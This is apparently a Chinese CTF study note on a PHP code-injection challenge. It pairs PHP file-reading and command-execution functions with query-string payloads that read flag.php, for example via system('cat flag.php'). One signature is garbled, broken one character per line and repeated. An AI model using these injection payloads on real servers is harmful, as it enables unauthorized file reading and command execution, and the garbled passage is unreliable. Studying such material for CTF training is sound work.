题目
知识点:
- PHP文件读取函数
- 利用Linux读取文件的函数
(一)PHP中文件读取的几个函数:
- fread
- fgets
- fgetss
- file
- readfile
- file_get_contents
- show_source
参考来源:https://www.jb51.net/article/53266.htm
(二)利用Linux读取文件的函数
- system
- exec
- shell_exec
- passthru
- popen
参考来源: https://bbs.ichunqiu.com/forum.php?mod=viewthread&tid=45706
1. fread: string fread ( int $handle , int $length )
fread() 从 handle 指向的文件中读取最多 length 个字节。该函数在读取完最多 length 个字节数,或到达 EOF 的时候,或(对于网络流)当一个包可用时,或(在打开用户空间流之后)已读取了 8192 个字节时就会停止读取文件,视乎先碰到哪种情况。
fread() 返回所读取的字符串,如果出错返回 FALSE。
payload:?hello=fread(fopen("flag.php","r"),100)
2. fgets ---------- 读取flag失败,因为碰到换行符会结束读取
string fgets ( int $handle [, int $length ] )
fgets()从 handle 指向的文件中读取一行并返回长度最多为 length - 1 字节的字符串。碰到换行符(包括在返回值中)、EOF 或者已经读取了 length - 1 字节后停止(看先碰到那一种情况)。如果没有指定 length,则默认为 1K,或者说 1024 字节。
payload:?hello=fgets(fopen("flag.php","r"),100)
3. fgetss ---------- 读取flag失败,因为碰到换行符会结束读取
string fgetss ( resource $handle [, int $length [, string $allowable_tags ]] )
跟fgets功能一样,但是fgetss会尝试从读取的文本中去掉任何 HTML 和 PHP 标记,可以用可选的第三个参数指定哪些标记不被去掉。
payload: ?hello=fgetss(fopen("flag.php","r"),100)
4. file
array file ( string $filename [, int $use_include_path [, resource $context ]] )
将文件内容读入一个数组中,数组的每一项对应文件中的一行,包括换行符在内。不需要行结束符时可以使用 rtrim() 函数过滤换行符。
payload: ?hello=file("flag.php")
5. readfile
int readfile ( string $filename [, bool $use_include_path [, resource $context ]] )
读入一个文件并写入到输出缓冲。返回从文件中读入的字节数。如果出错返回 FALSE 并且除非是以 @readfile() 形式调用,否则会显示错误信息。
payload :?hello=readfile("flag.php")
6. file_get_contents
string file_get_contents ( string $filename [, bool $use_include_path [, resource $context [, int $offset [, int
m
a
x
l
e
n
]
]
]
]
)
将
文
件
读
入
一
个
字
符
串
。
第
三
个
参
数
maxlen ]]]] ) 将文件读入一个字符串。第三个参数
maxlen]]]])将文件读入一个字符串。第三个参数context可以用来设置一些参数,比如访问远程文件时,设置超时等等。
payload :?hello=file_get_contents("flag.php")
7. show_source
show_source() 函数等同于 highlight_file() 函数,可将一个 PHP 脚本文件语法高亮。
payload : ?hello=show_source("flag.php")
8. system
system() 函数用于执行外部程序,输出执行结果,并返回结果的最后一行。
payload: ?hello=system("cat flag.php")
9. exec
exec() 函数用于执行一个外部程序,并返回结果的最后一行。
payload: ?hello=exec("cat flag.php")
10. shell_exec
shell_exec() 函数可通过 shell 环境执行命令,并返回所有执行结果,本函数功能与执行运算符相同。
payload: ?hello=shell_exec("cat flag.php")
11. passthru()
passthru() 函数用于执行外部函数,并输出原始执行结果,没有返回值。
payload: ?hello=passthru("cat flag.php")
12. popen()
popen() 函数用于创建指向命令执行进程的文件句柄,与 fopen() 函数类似,最后将通过 fread() 函数读取命令执行的结果。
payload: ?hello=fread(popen("cat flag.php","r"),100)